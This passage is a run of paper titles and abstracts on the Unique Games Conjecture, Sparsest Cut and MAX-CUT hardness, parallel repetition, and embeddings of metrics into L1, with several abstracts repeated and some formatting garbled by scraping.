gap instance of Sparsest Cut. 
This enables us to prove a $(\log \log n)^{1/6-\delta}$ integrality gap for Sparsest Cut, which is known to be equivalent to the metric embedding lower bound. --- paper_title: Improved lower bounds for embeddings into L1 paper_content: We improve upon recent lower bounds on the minimum distortion of embedding certain finite metric spaces into $L_1$. In particular, we show that for every $n\ge1$, there is an $n$-point metric space of negative type that requires a distortion of $\Omega(\log\log n)$ for such an embedding, implying the same lower bound on the integrality gap of a well-known semidefinite programming relaxation for sparsest cut. This result builds upon and improves the recent lower bound of $(\log\log n)^{1/6-o(1)}$ due to Khot and Vishnoi [The unique games conjecture, integrality gap for cut problems and the embeddability of negative type metrics into $l_1$, in Proceedings of the 46th Annual IEEE Symposium on Foundations of Computer Science, IEEE, Piscataway, NJ, 2005, pp. 53-62]. We also show that embedding the edit distance metric on $\{0,1\}^n$ into $L_1$ requires a distortion of $\Omega(\log n)$. This result improves a very recent $(\log n)^{1/2-o(1)}$ lower bound by Khot and Naor [Nonembeddability theorems via Fourier analysis, in Proceedings of the 46th Annual IEEE Symposium on Foundations of Computer Science, IEEE, Piscataway, NJ, 2005, pp. 101-112]. --- paper_title: ON THE HARDNESS OF APPROXIMATING MULTICUT AND SPARSEST-CUT paper_content: We show that the Multicut, Sparsest-Cut, and Min-2CNF ? Deletion problems are NP-hard to approximate within every constant factor, assuming the Unique Games Conjecture of Khot (2002). A quantitatively stronger version of the conjecture implies an inapproximability factor of $$\Omega(\sqrt{\log \log n}).$$ --- paper_title: Integrality gaps for sparsest cut and minimum linear arrangement problems paper_content: Arora, Rao and Vazirani [2] showed that the standard semi-definite programming (SDP) relaxation of the Sparsest Cut problem with the triangle inequality constraints has an integrality gap of O(√log n). They conjectured that the gap is bounded from above by a constant. In this paper, we disprove this conjecture (referred to as the ARV-Conjecture) by constructing an Ω(log log n) integrality gap instance. Khot and Vishnoi [16] had earlier disproved the non-uniform version of the ARV-Conjecture.A simple "stretching" of the integrality gap instance for the Sparsest Cut problem serves as an Ω(log log n) integrality gap instance for the SDP relaxation of the Minimum Linear Arrangement problem. This SDP relaxation was considered in [6, 11], where it was shown that its integrality gap is bounded from above by O(√log n log log n). --- paper_title: The Unique Games Conjecture, Integrality Gap for Cut Problems and Embeddability of Negative Type Metrics into ℓ1 paper_content: In this paper, we disprove a conjecture of Goemans and Linial; namely, that every negative type metric embeds into $\ell_1$ with constant distortion. We show that for an arbitrarily small constant $\delta> 0$, for all large enough $n$, there is an $n$-point negative type metric which requires distortion at least $(\log\log n)^{1/6-\delta}$ to embed into $\ell_1.$ ::: Surprisingly, our construction is inspired by the Unique Games Conjecture (UGC) of Khot, establishing a previously unsuspected connection between probabilistically checkable proof systems (PCPs) and the theory of metric embeddings. 
We first prove that the UGC implies a super-constant hardness result for the (non-uniform) Sparsest Cut problem. Though this hardness result relies on the UGC, we demonstrate, nevertheless, that the corresponding PCP reduction can be used to construct an "integrality gap instance" for Sparsest Cut. Towards this, we first construct an integrality gap instance for a natural SDP relaxation of Unique Games. Then we "simulate" the PCP reduction and "translate" the integrality gap instance of Unique Games to an integrality gap instance of Sparsest Cut. This enables us to prove a $(\log \log n)^{1/6-\delta}$ integrality gap for Sparsest Cut, which is known to be equivalent to the metric embedding lower bound. --- paper_title: Limit theorems for polylinear forms paper_content: The limit theorems for polylinear forms are obtained. Conditions are found under which the distribution of the polylinear form of many random variables is essentially the same as if all the distributions of arguments were normal. --- paper_title: Geometric bounds on the Ornstein-Uhlenbeck velocity process paper_content: Let X: Ω→C(ℝ+;ℝ n ) be the Ornstein-Uhlenbeck velocity process in equilibrium and denote by τ A =τ A (X) the first hitting time of \(A \subseteq \mathbb{R}^n \). If A, B∈ℛn and ℙ(X(O)∈A=ℙ(X n (O)≦a), ℙ(X n (O)∈B=ℙ(X n (O)≧b)we prove that \(\mathbb{P}(\tau _A \underset{\raise0.3em\hbox{$\smash{\scriptscriptstyle-}$}}{ \leqslant } t)\underset{\raise0.3em\hbox{$\smash{\scriptscriptstyle-}$}}{ \geqslant } \mathbb{P}(\tau _{\{ \chi _n \underset{\raise0.3em\hbox{$\smash{\scriptscriptstyle-}$}}{ \leqslant } a\} } \underset{\raise0.3em\hbox{$\smash{\scriptscriptstyle-}$}}{ \leqslant } t)\) and \(\mathbb{E}\left( {\int\limits_0^{t \wedge \tau A} {1_{\text{B}} (X({\text{s}})d{\text{s}}} } \right)\underset{\raise0.3em\hbox{$\smash{\scriptscriptstyle-}$}}{ \leqslant } \mathbb{E}\left( {\int\limits_0^{t \wedge \tau _{\left\{ {x_n \underset{\raise0.3em\hbox{$\smash{\scriptscriptstyle-}$}}{ \leqslant } a} \right\}} } {1_{\left\{ {x_n \underset{\raise0.3em\hbox{$\smash{\scriptscriptstyle-}$}}{ \geqslant } b} \right\}} (X({\text{s))}}d{\text{s}}} } \right)\). Here X n denotes the n-th component of X. --- paper_title: Optimal inapproximability results for MAX-CUT and other 2-variable CSPs? paper_content: In this paper, we give evidence suggesting that MAX-CUT is NP-hard to approximate to within a factor of /spl alpha//sub cw/+ /spl epsi/, for all /spl epsi/ > 0, where /spl alpha//sub cw/ denotes the approximation ratio achieved by the Goemans-Williamson algorithm (1995). /spl alpha//sub cw/ /spl ap/ .878567. This result is conditional, relying on two conjectures: a) the unique games conjecture of Khot; and, b) a very believable conjecture we call the majority is stablest conjecture. These results indicate that the geometric nature of the Goemans-Williamson algorithm might be intrinsic to the MAX-CUT problem. The same two conjectures also imply that it is NP-hard to (/spl beta/ + /spl epsi/)-approximate MAX-2SAT, where /spl beta/ /spl ap/ .943943 is the minimum of (2 + (2//spl pi/) /spl theta/)/(3 - cos(/spl theta/)) on (/spl pi//2, /spl pi/). Motivated by our proof techniques, we show that if the MAX-2CSP and MAX-2SAT problems are slightly restricted - in a way that seems to retain all their hardness -then they have (/spl alpha//sub GW/-/spl epsi/)- and (/spl beta/ - /spl epsi/)-approximation algorithms, respectively. 
Though we are unable to prove the majority is stablest conjecture, we give some partial results and indicate possible directions of attack. Our partial results are enough to imply that MAX-CUT is hard to (3/4 + 1/(2/spl pi/) + /spl epsi/)-approximate (/spl ap/ .909155), assuming only the unique games conjecture. We also discuss MAX-2CSP problems over non-Boolean domains and state some related results and conjectures. We show, for example, that the unique games conjecture implies that it is hard to approximate MAX-2LIN(q) to within any constant factor. --- paper_title: Noise stability of functions with low influences: Invariance and optimality paper_content: In this paper we study functions with low influences on product probability spaces. The analysis of boolean functions with low influences has become a central problem in discrete Fourier analysis. It is motivated by fundamental questions arising from the construction of probabilistically checkable proofs in theoretical computer science and from problems in the theory of social choice in economics. ::: We prove an invariance principle for multilinear polynomials with low influences and bounded degree; it shows that under mild conditions the distribution of such polynomials is essentially invariant for all product spaces. Ours is one of the very few known non-linear invariance principles. It has the advantage that its proof is simple and that the error bounds are explicit. We also show that the assumption of bounded degree can be eliminated if the polynomials are slightly ``smoothed''; this extension is essential for our applications to ``noise stability''-type problems. ::: In particular, as applications of the invariance principle we prove two conjectures: the ``Majority Is Stablest'' conjecture from theoretical computer science, which was the original motivation for this work, and the ``It Ain't Over Till It's Over'' conjecture from social choice theory. --- paper_title: Optimal Long Code Test with One Free Bit paper_content: For arbitrarily small constants epsilon, delta ≫ 0$, we present a long code test with one free bit, completeness 1-epsilon and soundness delta. Using the test, we prove the following two inapproximability results:1. Assuming the Unique Games Conjecture of Khot, given an n-vertex graph that has two disjoint independent sets of size (1/2-epsilon)n each, it is NP-hard to find an independent set of size delta n.2. Assuming a (new) stronger version of the Unique Games Conjecture, the scheduling problem of minimizing weighted completion time with precedence constraints is inapproximable within factor 2-epsilon. --- paper_title: Noise stability of functions with low influences: Invariance and optimality paper_content: In this paper we study functions with low influences on product probability spaces. The analysis of boolean functions with low influences has become a central problem in discrete Fourier analysis. It is motivated by fundamental questions arising from the construction of probabilistically checkable proofs in theoretical computer science and from problems in the theory of social choice in economics. ::: We prove an invariance principle for multilinear polynomials with low influences and bounded degree; it shows that under mild conditions the distribution of such polynomials is essentially invariant for all product spaces. Ours is one of the very few known non-linear invariance principles. It has the advantage that its proof is simple and that the error bounds are explicit. 
We also show that the assumption of bounded degree can be eliminated if the polynomials are slightly ``smoothed''; this extension is essential for our applications to ``noise stability''-type problems. ::: In particular, as applications of the invariance principle we prove two conjectures: the ``Majority Is Stablest'' conjecture from theoretical computer science, which was the original motivation for this work, and the ``It Ain't Over Till It's Over'' conjecture from social choice theory. --- paper_title: Gowers uniformity, influence of variables, and PCPs paper_content: Gowers introduced, for d\geq 1, the notion of dimension-d uniformity U^d(f) of a function f: G -> \C, where G is a finite abelian group and \C are the complex numbers. Roughly speaking, if U^d(f) is small, then f has certain "pseudorandomness" properties. ::: We prove the following property of functions with large U^d(f). Write G=G_1 x >... x G_n as a product of groups. If a bounded balanced function f:G_1 x ... x G_n -> \C is such that U^{d} (f) > epsilon, then one of the coordinates of f has influence at least epsilon/2^{O(d)}. ::: The Gowers inner product of a collection of functions is a related notion of pseudorandomness. We prove that if a collection of bounded functions has large Gowers inner product, and at least one function in the collection is balanced, then there is a variable that has high influence for at least four of the functions in the collection. ::: Finally, we relate the acceptance probability of the "hypergraph long-code test" proposed by Samorodnitsky and Trevisan to the Gowers inner product of the functions being tested and we deduce applications to the construction of Probabilistically Checkable Proofs and to hardness of approximation. --- paper_title: Expander flows, geometric embeddings and graph partitioning paper_content: We give a O(slog n)-approximation algorithm for the sparsest cut, edge expansion, balanced separator, and graph conductance problems. This improves the O(log n)-approximation of Leighton and Rao (1988). We use a well-known semidefinite relaxation with triangle inequality constraints. Central to our analysis is a geometric theorem about projections of point sets in Rd, whose proof makes essential use of a phenomenon called measure concentration. We also describe an interesting and natural “approximate certificate” for a graph's expansion, which involves embedding an n-node expander in it with appropriate dilation and congestion. We call this an expander flow. --- paper_title: Sharp kernel clustering algorithms and their associated Grothendieck inequalities paper_content: In the kernel clustering problem we are given a (large) $n\times n$ symmetric positive semidefinite matrix $A=(a_{ij})$ with $\sum_{i=1}^n\sum_{j=1}^n a_{ij}=0$ and a (small) $k\times k$ symmetric positive semidefinite matrix $B=(b_{ij})$. The goal is to find a partition $\{S_1,...,S_k\}$ of $\{1,... n\}$ which maximizes $ \sum_{i=1}^k\sum_{j=1}^k (\sum_{(p,q)\in S_i\times S_j}a_{pq})b_{ij}$. We design a polynomial time approximation algorithm that achieves an approximation ratio of $\frac{R(B)^2}{C(B)}$, where $R(B)$ and $C(B)$ are geometric parameters that depend only on the matrix $B$, defined as follows: if $b_{ij} =$ is the Gram matrix representation of $B$ for some $v_1,...,v_k\in \R^k$ then $R(B)$ is the minimum radius of a Euclidean ball containing the points $\{v_1, ..., v_k\}$. 
The parameter $C(B)$ is defined as the maximum over all measurable partitions $\{A_1,...,A_k\}$ of $\R^{k-1}$ of the quantity $\sum_{i=1}^k\sum_{j=1}^k b_{ij}$, where for $i\in \{1,...,k\}$ the vector $z_i\in \R^{k-1}$ is the Gaussian moment of $A_i$, i.e., $z_i=\frac{1}{(2\pi)^{(k-1)/2}}\int_{A_i}xe^{-\|x\|_2^2/2}dx$. We also show that for every $\eps>0$, achieving an approximation guarantee of $(1-\e)\frac{R(B)^2}{C(B)}$ is Unique Games hard. --- paper_title: Optimal inapproximability results for MAX-CUT and other 2-variable CSPs? paper_content: In this paper, we give evidence suggesting that MAX-CUT is NP-hard to approximate to within a factor of /spl alpha//sub cw/+ /spl epsi/, for all /spl epsi/ > 0, where /spl alpha//sub cw/ denotes the approximation ratio achieved by the Goemans-Williamson algorithm (1995). /spl alpha//sub cw/ /spl ap/ .878567. This result is conditional, relying on two conjectures: a) the unique games conjecture of Khot; and, b) a very believable conjecture we call the majority is stablest conjecture. These results indicate that the geometric nature of the Goemans-Williamson algorithm might be intrinsic to the MAX-CUT problem. The same two conjectures also imply that it is NP-hard to (/spl beta/ + /spl epsi/)-approximate MAX-2SAT, where /spl beta/ /spl ap/ .943943 is the minimum of (2 + (2//spl pi/) /spl theta/)/(3 - cos(/spl theta/)) on (/spl pi//2, /spl pi/). Motivated by our proof techniques, we show that if the MAX-2CSP and MAX-2SAT problems are slightly restricted - in a way that seems to retain all their hardness -then they have (/spl alpha//sub GW/-/spl epsi/)- and (/spl beta/ - /spl epsi/)-approximation algorithms, respectively. Though we are unable to prove the majority is stablest conjecture, we give some partial results and indicate possible directions of attack. Our partial results are enough to imply that MAX-CUT is hard to (3/4 + 1/(2/spl pi/) + /spl epsi/)-approximate (/spl ap/ .909155), assuming only the unique games conjecture. We also discuss MAX-2CSP problems over non-Boolean domains and state some related results and conjectures. We show, for example, that the unique games conjecture implies that it is hard to approximate MAX-2LIN(q) to within any constant factor. --- paper_title: Parallel repetition: simplifications and the no-signaling case paper_content: Consider a game where a refereed chooses (x,y) according to a publiclyknown distribution PXY, sends x to Alice, and y to Bob. Withoutcommunicating with each other, Alice responds with a value "a" and Bobresponds with a value "b". Alice and Bob jointly win if a publiclyknown predicate Q(x,y,a,b) holds. Let such a game be given and assume that the maximum probabilitythat Alice and Bob can win is v --- paper_title: Probabilistic checking of proofs: a new characterization of NP paper_content: We give a new characterization of NP: the class NP contains exactly those languages <italic>L</italic> for which membership proofs (a proof that an input <italic>x</italic> is in <italic>L</italic>) can be verified probabilistically in polynomial time using <italic>logarithmic</italic> number of random bits and by reading <italic>sublogarithmic</italic> number of bits from the proof. ::: We discuss implications of this characterization; specifically, we show that approximating Clique and Independent Set, even in a very weak sense, is NP-hard. 
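The constant $\alpha_{GW}\approx 0.878567$ that recurs in the MAX-CUT entries is the guarantee of random-hyperplane rounding, $\alpha_{GW}=\min_{0<\theta\le\pi}\frac{2}{\pi}\cdot\frac{\theta}{1-\cos\theta}$. The sketch below is illustrative only: it performs just the rounding step, assuming the unit vectors $v_1,\dots,v_n$ have already been obtained from an SDP solver (here they are hard-coded for a 4-cycle), and reports the best cut found over a few random hyperplanes.

```python
import numpy as np

def hyperplane_round(vectors, edges, trials=20, seed=0):
    """Goemans-Williamson-style random-hyperplane rounding.

    vectors: (n, d) array of unit vectors, assumed to come from the
             MAX-CUT SDP optimum (not computed here).
    edges:   dict mapping (i, j) pairs to nonnegative edge weights.
    Returns the largest cut weight observed over `trials` hyperplanes.
    """
    rng = np.random.default_rng(seed)
    best = 0.0
    for _ in range(trials):
        g = rng.normal(size=vectors.shape[1])   # random hyperplane normal
        side = vectors @ g >= 0                 # partition vertices by sign
        cut = sum(w for (i, j), w in edges.items() if side[i] != side[j])
        best = max(best, cut)
    return best

if __name__ == "__main__":
    # Hypothetical SDP embedding for the 4-cycle (its optimum places
    # opposite vertices at the same point); the true max cut is 4.
    vecs = np.array([[1.0, 0.0], [-1.0, 0.0], [1.0, 0.0], [-1.0, 0.0]])
    c4 = {(0, 1): 1.0, (1, 2): 1.0, (2, 3): 1.0, (3, 0): 1.0}
    print(hyperplane_round(vecs, c4))           # prints 4.0 almost surely
```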
--- paper_title: Parallel Repetition in Projection Games and a Concentration Bound paper_content: A two-player game is played by cooperating players who are not allowed to communicate. A referee asks the players questions sampled from some known distribution and decides whether they win or not based on a known predicate of the questions and the players' answers. The parallel repetition of the game is the game in which the referee samples $n$ independent pairs of questions and sends the corresponding questions to the players simultaneously. If the players cannot win the original game with probability better than $(1-\epsilon)$, what's the best they can do in the repeated game? We improve earlier results of [R. Raz, SIAM J. Comput., 27 (1998), pp. 763-803] and [T. Holenstein, Theory Comput., 5 (2009), pp. 141-172], who showed that the players cannot win all copies in the repeated game with probability better than $(1-\epsilon/2)^{\Omega(n\epsilon^2/c)}$ (here $c$ is the length of the answers in the game), in the following ways: (i) We show that the probability of winning all copies is $(1-\epsilon/2)^{\Omega(\epsilon n)}$ as long as the game is a “projection game,” the type of game most commonly used in hardness of approximation results. (ii) We prove a concentration bound for parallel repetition (of general games) showing that for any constant $0 0$, there exists an alphabet size $M(\epsilon)$ for which it is NP-hard to distinguish a unique game with alphabet size $M$ in which a $(1-\epsilon^2)$ fraction of the constraints can be satisfied from one in which a $(1-\epsilon f(1/\epsilon))$ fraction of the constraints can be satisfied. --- paper_title: Approximation Resistant Predicates from Pairwise Independence paper_content: We study the approximability of predicates on k variables from a domain [q], and give a new sufficient condition for such predicates to be approximation resistant under the Unique Games Conjecture. ... --- paper_title: Understanding Parallel Repetition Requires Understanding Foams paper_content: Motivated by the study of parallel repetition and also by the unique games conjecture, we investigate the value of the "odd cycle games" under parallel repetition. Using tools from discrete harmonic analysis, we show that after d rounds on the cycle of length m, the value of the game is at most 1-(1/m)ldrOmega macr(radicd) (for dlesm2, say). This beats the natural barrier of 1-Theta(1/m)2 ldrd for Raz-style proofs and also the SDP bound of Feige-Lovasz; however, it just barely fails to have implications for unique games. On the other hand, we also show that improving our bound would require proving nontrivial lower bounds on the surface area of high-dimensional foams. Specifically, one would need to answer: what is the least surface area of a cell that tiles Rd by the lattice Zd? --- paper_title: A Counterexample to Strong Parallel Repetition paper_content: The parallel repetition theorem states that, for any two-prover game with value $1-\epsilon$ (for, say, $\epsilon\leq1/2$), the value of the game repeated in parallel $n$ times is at most $(1-\epsilon^c)^{\Omega(n/s)}$, where $s$ is the answer's length (of the original game) and $c$ is a universal constant [R. Raz, SIAM J. Comput., 27 (1998), pp. 763-803]. Several researchers asked whether this bound could be improved to $(1-\epsilon)^{\Omega(n/s)}$; this question is usually referred to as the strong parallel repetition problem. We show that the answer to this question is negative. 
More precisely, we consider the odd cycle game of size $m$, a two-prover game with value $1-1/2m$. We show that the value of the odd cycle game repeated in parallel $n$ times is at least $1-(1/m)\cdot O(\sqrt{n})$. This implies that, for large enough $n$ (say, $n\geq\Omega(m^2)$), the value of the odd cycle game repeated in parallel $n$ times is at least $(1-1/4m^2)^{O(n)}$. Thus the following hold. 1. For parallel repetition of general games, the bounds of $(1-\epsilon^c)^{\Omega(n/s)}$ given in [R. Raz, SIAM J. Comput., 27 (1998), pp. 763-803; T. Holenstein, in Proceedings of STOC 2002, ACM, New York, 2002, pp. 767-775] are of the right form, up to determining the exact value of the constant $c\geq2$. 2. For parallel repetition of XOR games, unique games, and projection games, the bounds of $(1-\epsilon^2)^{\Omega(n)}$ given in [U. Feige, G. Kindler, and R. O'Donnell, in Proceedings of CCC 2007, IEEE Computer Society, Washington, DC, 2007, pp. 179-192] (for XOR games) and in [A. Rao, in Proceedings of STOC 2008, ACM, New York, 2008, pp. 1-10] (for unique and projection games) are tight. 3. For parallel repetition of the odd cycle game, the bound of $1-(1/m)\cdot\tilde{\Omega}(\sqrt{n})$ given in [U. Feige, G. Kindler, and R. O'Donnell, in Proceedings of CCC 2007, IEEE Computer Society, Washington, DC, 2007, pp. 179-192] is almost tight. A major motivation for the recent interest in the strong parallel repetition problem is that a strong parallel repetition theorem would have implied that the unique game conjecture is equivalent to the NP hardness of distinguishing between instances of Max-Cut that are at least $1-\epsilon^2$ satisfiable from instances that are at most $1-(2/\pi)\cdot\epsilon$ satisfiable. Our results suggest that this cannot be proved just by improving the known bounds on parallel repetition. --- paper_title: Consequences and limits of nonlocal strategies paper_content: This paper investigates the powers and limitations of quantum entanglement in the context of cooperative games of incomplete information. We give several examples of such nonlocal games where strategies that make use of entanglement outperform all possible classical strategies. One implication of these examples is that entanglement can profoundly affect the soundness property of two-prover interactive proof systems. We then establish limits on the probability with which strategies making use of entanglement can win restricted types of nonlocal games. These upper bounds may be regarded as generalizations of Tsirelson-type inequalities, which place bounds on the extent to which quantum information can allow for the violation of Bell inequalities. We also investigate the amount of entanglement required by optimal and nearly optimal quantum strategies for some games. --- paper_title: Rounding Parallel Repetitions of Unique Games paper_content: We show a connection between the semidefinite relaxation of unique games and their behavior under parallel repetition. Specifically,denoting by val(G) the value of a two-prover unique game G, andby sdpval(G) the value of a natural semidefinite program to approximate val(G), we prove that for every l epsi N, if sdpval(G) ges 1-delta, then val(Gl) ges 1-radicsldelta. Here, Gl denotes the l-fold parallel repetition of G, and s=O(log(k/delta)), where k denotes the alphabet size of the game. For the special case where G is an XOR game (i.e., k=2), we obtain the same bound but with s as an absolute constant. Our bounds on s are optimal up to a factor of O(log(1/delta)). 
For games with a significant gap between the quantities val(G) and sdpval(G), our result implies that val(G^l) may be much larger than val(G)^l, giving a counterexample to the strong parallel repetition conjecture. In a recent breakthrough, Raz (FOCS'08) has shown such an example using the max-cut game on odd cycles. Our results are based on a generalization of his techniques. --- paper_title: Inapproximability Results for Sparsest Cut, Optimal Linear Arrangement, and Precedence Constrained Scheduling paper_content: We consider (uniform) sparsest cut, optimal linear arrangement and the precedence constrained scheduling problem $1|prec|\sum w_j C_j$. So far, these three notorious NP-hard problems have resisted all attempts to prove inapproximability results. We show that they have no polynomial time approximation scheme (PTAS), unless NP-complete problems can be solved in randomized subexponential time. Furthermore, we prove that the scheduling problem is as hard to approximate as vertex cover when the so-called fixed cost, that is present in all feasible solutions, is subtracted from the objective function. --- paper_title: Sharp kernel clustering algorithms and their associated Grothendieck inequalities paper_content: In the kernel clustering problem we are given a (large) $n\times n$ symmetric positive semidefinite matrix $A=(a_{ij})$ with $\sum_{i=1}^n\sum_{j=1}^n a_{ij}=0$ and a (small) $k\times k$ symmetric positive semidefinite matrix $B=(b_{ij})$. The goal is to find a partition $\{S_1,...,S_k\}$ of $\{1,... n\}$ which maximizes $ \sum_{i=1}^k\sum_{j=1}^k (\sum_{(p,q)\in S_i\times S_j}a_{pq})b_{ij}$. We design a polynomial time approximation algorithm that achieves an approximation ratio of $\frac{R(B)^2}{C(B)}$, where $R(B)$ and $C(B)$ are geometric parameters that depend only on the matrix $B$, defined as follows: if $b_{ij}=\langle v_i,v_j\rangle$ is the Gram matrix representation of $B$ for some $v_1,...,v_k\in \R^k$ then $R(B)$ is the minimum radius of a Euclidean ball containing the points $\{v_1, ..., v_k\}$. The parameter $C(B)$ is defined as the maximum over all measurable partitions $\{A_1,...,A_k\}$ of $\R^{k-1}$ of the quantity $\sum_{i=1}^k\sum_{j=1}^k b_{ij}\langle z_i,z_j\rangle$, where for $i\in \{1,...,k\}$ the vector $z_i\in \R^{k-1}$ is the Gaussian moment of $A_i$, i.e., $z_i=\frac{1}{(2\pi)^{(k-1)/2}}\int_{A_i}xe^{-\|x\|_2^2/2}dx$. We also show that for every $\epsilon>0$, achieving an approximation guarantee of $(1-\epsilon)\frac{R(B)^2}{C(B)}$ is Unique Games hard. --- paper_title: The Unique Games Conjecture, Integrality Gap for Cut Problems and Embeddability of Negative Type Metrics into ℓ1 paper_content: In this paper, we disprove a conjecture of Goemans and Linial; namely, that every negative type metric embeds into $\ell_1$ with constant distortion. We show that for an arbitrarily small constant $\delta> 0$, for all large enough $n$, there is an $n$-point negative type metric which requires distortion at least $(\log\log n)^{1/6-\delta}$ to embed into $\ell_1$. Surprisingly, our construction is inspired by the Unique Games Conjecture (UGC) of Khot, establishing a previously unsuspected connection between probabilistically checkable proof systems (PCPs) and the theory of metric embeddings. We first prove that the UGC implies a super-constant hardness result for the (non-uniform) Sparsest Cut problem. Though this hardness result relies on the UGC, we demonstrate, nevertheless, that the corresponding PCP reduction can be used to construct an "integrality gap instance" for Sparsest Cut.
Towards this, we first construct an integrality gap instance for a natural SDP relaxation of Unique Games. Then we "simulate" the PCP reduction and "translate" the integrality gap instance of Unique Games to an integrality gap instance of Sparsest Cut. This enables us to prove a $(\log \log n)^{1/6-\delta}$ integrality gap for Sparsest Cut, which is known to be equivalent to the metric embedding lower bound. --- paper_title: Optimal inapproximability results for MAX-CUT and other 2-variable CSPs? paper_content: In this paper, we give evidence suggesting that MAX-CUT is NP-hard to approximate to within a factor of $\alpha_{GW}+\epsilon$, for all $\epsilon > 0$, where $\alpha_{GW}$ denotes the approximation ratio achieved by the Goemans-Williamson algorithm (1995). $\alpha_{GW} \approx .878567$. This result is conditional, relying on two conjectures: a) the unique games conjecture of Khot; and, b) a very believable conjecture we call the majority is stablest conjecture. These results indicate that the geometric nature of the Goemans-Williamson algorithm might be intrinsic to the MAX-CUT problem. The same two conjectures also imply that it is NP-hard to $(\beta + \epsilon)$-approximate MAX-2SAT, where $\beta \approx .943943$ is the minimum of $(2 + (2/\pi)\theta)/(3 - \cos(\theta))$ on $(\pi/2, \pi)$. Motivated by our proof techniques, we show that if the MAX-2CSP and MAX-2SAT problems are slightly restricted - in a way that seems to retain all their hardness - then they have $(\alpha_{GW}-\epsilon)$- and $(\beta - \epsilon)$-approximation algorithms, respectively. Though we are unable to prove the majority is stablest conjecture, we give some partial results and indicate possible directions of attack. Our partial results are enough to imply that MAX-CUT is hard to $(3/4 + 1/(2\pi) + \epsilon)$-approximate ($\approx .909155$), assuming only the unique games conjecture. We also discuss MAX-2CSP problems over non-Boolean domains and state some related results and conjectures. We show, for example, that the unique games conjecture implies that it is hard to approximate MAX-2LIN(q) to within any constant factor. --- paper_title: On the integrality ratio of semidefinite relaxations of MAX CUT paper_content: MAX CUT is the problem of partitioning the vertices of a graph into two sets, maximizing the number of edges joining these sets. This problem is NP-hard. Goemans and Williamson proposed an algorithm that first uses a semidefinite programming relaxation of MAX CUT to embed the vertices of the graph on the surface of an n dimensional sphere, and then uses a random hyperplane to cut the sphere in two, giving a cut of the graph. They show that the expected number of edges in the random cut is at least $\alpha \cdot \mathrm{sdp}$, where $\alpha \simeq 0.87856$ and sdp is the value of the semidefinite program. This manuscript shows the following results: 1. The integrality ratio of the semidefinite program is $\alpha$. The previously known bound on the integrality ratio was roughly 0.8845. 2. In the presence of the so called “triangle constraints”, the integrality ratio is no better than roughly 0.891. The previously known bound was above 0.95. --- paper_title: Graph expansion and the unique games conjecture paper_content: The edge expansion of a subset of vertices S ⊆ V in a graph G measures the fraction of edges that leave S. In a d-regular graph, the edge expansion/conductance Φ(S) of a subset S ⊆ V is defined as Φ(S) = (|E(S, V\S)|)/(d|S|).
Approximating the conductance of small linear sized sets (size δ n) is a natural optimization question that is a variant of the well-studied Sparsest Cut problem. However, there are no known algorithms to even distinguish between almost complete edge expansion (Φ(S) = 1-ε), and close to 0 expansion. In this work, we investigate the connection between Graph Expansion and the Unique Games Conjecture. Specifically, we show the following: We show that a simple decision version of the problem of approximating small set expansion reduces to Unique Games. Thus if approximating edge expansion of small sets is hard, then Unique Games is hard. Alternatively, a refutation of the UGC will yield better algorithms to approximate edge expansion in graphs. This is the first non-trivial "reverse" reduction from a natural optimization problem to Unique Games. Under a slightly stronger UGC that assumes mild expansion of small sets, we show that it is UG-hard to approximate small set expansion. On instances with sufficiently good expansion of small sets, we show that Unique Games is easy by extending the techniques of [4]. --- paper_title: Expander flows, geometric embeddings and graph partitioning paper_content: We give a O(slog n)-approximation algorithm for the sparsest cut, edge expansion, balanced separator, and graph conductance problems. This improves the O(log n)-approximation of Leighton and Rao (1988). We use a well-known semidefinite relaxation with triangle inequality constraints. Central to our analysis is a geometric theorem about projections of point sets in Rd, whose proof makes essential use of a phenomenon called measure concentration. We also describe an interesting and natural “approximate certificate” for a graph's expansion, which involves embedding an n-node expander in it with appropriate dilation and congestion. We call this an expander flow. --- paper_title: ON THE HARDNESS OF APPROXIMATING MULTICUT AND SPARSEST-CUT paper_content: We show that the Multicut, Sparsest-Cut, and Min-2CNF ? Deletion problems are NP-hard to approximate within every constant factor, assuming the Unique Games Conjecture of Khot (2002). A quantitatively stronger version of the conjecture implies an inapproximability factor of $$\Omega(\sqrt{\log \log n}).$$ --- paper_title: DIFFERENTIATING MAPS INTO L 1 , AND THE GEOMETRY OF BV FUNCTIONS paper_content: This is one of a series of papers examining the interplay between differentiation theory for Lipschitz maps, X-->V, and bi-Lipschitz nonembeddability, where X is a metric measure space and V is a Banach space. Here, we consider the case V=L^1 where differentiability fails. ::: We establish another kind of differentiability for certain X, including R^n and H, the Heisenberg group with its Carnot-Cartheodory metric. It follows that H does not bi-Lipschitz embed into L^1, as conjectured by J. Lee and A. Naor. When combined with their work, this provides a natural counter example to the Goemans-Linial conjecture in theoretical computer science; the first such counterexample was found by Khot-Vishnoi. A key ingredient in the proof of our main theorem is a new connection between Lipschitz maps to L^1 and functions of bounded variation, which permits us to exploit recent work on the structure of BV functions on the Heisenberg group. --- paper_title: Finite metric spaces: combinatorics, geometry and algorithms paper_content: In the last several years a number of very interesting results were proved about finite metric spaces. 
Some of this work is motivated by practical considerations: Large data sets (coming e.g. from computational molecular biology, brain research or data mining) can be viewed as large metric spaces that should be analyzed (e.g. correctly clustered).On the other hand, these investigations connect to some classical areas of geometry - the asymptotic theory of finite-dimensional normed spaces and differential geometry. Finally, the metric theory of finite graphs has proved very useful in the study of graphs per se and the design of approximation algorithms for hard computational problems. In this talk I will try to explain some of the results and review some of the emerging new connections and the many fascinating open problems in this area. --- paper_title: Semidefinite Programming in Combinatorial Optimization paper_content: We discuss the use of semidefinite programming for combinatorial optimization problems. The main topics covered include (i) the Lovasz theta function and its applications to stable sets, perfect graphs, and coding theory, (ii) the automatic generation of strong valid inequalities, (iii) the maximum cut problem and related problems, and (iv) the embedding of finite metric spaces and its relationship to the sparsest cut problem. --- paper_title: Integrality Gaps for Strong SDP Relaxations of UNIQUE GAMES paper_content: With the work of Khot and Vishnoi (FOCS 2005) as a starting point, we obtain integrality gaps for certain strong SDP relaxations of unique games. Specifically, we exhibit a gap instance for the basic semidefinite program strengthened by all valid linear inequalities on the inner products of up to $\exp(\Omega(\log\log~n)^{1/4})$ vectors. For stronger relaxations obtained from the basic semidefinite program by $R$ rounds of Sherali--Adams lift-and-project, we prove a unique games integrality gap for $R = \Omega(\log\log~n)^{1/4}$.By composing these SDP gaps with UGC-hardness reductions, the above results imply corresponding integrality gaps for every problem for which a UGC-based hardness is known. Consequently, this work implies that including any valid constraints on up to$\exp(\Omega(\log\log~n)^{1/4})$ vectors to natural semidefinite program, does not improve the approximation ratio for any problem in the following classes: constraint satisfaction problems, ordering constraint satisfaction problems and metric labeling problems over constant-size 